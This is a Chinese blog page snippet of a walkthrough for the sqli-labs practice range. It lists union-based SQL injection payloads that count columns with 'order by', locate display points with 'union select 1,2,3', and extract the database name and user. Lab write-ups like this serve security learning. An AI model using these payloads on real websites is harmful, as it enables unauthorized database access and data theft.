- 博客(2)
- 收藏
- 关注
RSS订阅原创 sqli-labs靶场通关攻略
' union select 1,2,3 --+ 页面显示的是id=1的数据,没有显示我们联合查询的数据,把人家前面查询的id的数据改成不存在的,比如-1。' union select 1,database(),user() --+ 联合查询了数据库名和用户。' union select 1,2,3 --+ 此时页面上出现了我们联合查询的回显点。' order by 1 --+ 页面正常 说明存在1列。' order by 3 --+ 页面正常 说明存在3列。联合查询 查出网站的数据库里面的所有表名。
2024-08-14 20:57:46
279
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人